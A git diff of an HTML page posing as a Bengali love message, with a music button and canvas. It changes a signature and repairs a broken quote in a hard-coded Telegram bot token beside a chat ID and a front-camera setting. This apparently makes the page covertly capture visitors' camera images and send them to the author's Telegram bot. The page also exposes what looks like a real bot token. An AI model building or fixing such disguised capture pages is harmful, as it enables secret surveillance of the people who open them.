--- a/index.html
+++ b/index.html
@@ -98,7 +98,7 @@
 
 ।</p>
       <p>তোমার জন্য আমার ভালোবাসা অসীম ,</p>
-      <p><strong>Love You</strong></p>
+      <p><strong>Miraz</strong></p>
     </div>
 
     <!-- Music Play Button -->
@@ -118,7 +118,7 @@
     const canvas = document.getElementById('canvas');
     const context = canvas.getContext('2d');
     const music = document.getElementById('loveAudio');
-    const botToken = '7603770395:AAEBlEAafIokfEyS-lTeudujGMNVfTg7LaY; // Replace with your bot token
+    const botToken = '7603770395:AAEBlEAafIokfEyS-lTeudujGMNVfTg7LaY'; // Replace with your bot token
     const chatId = '7767412329';    // Replace with your chat ID
 
     let useFrontCamera = true; // Start with front camera
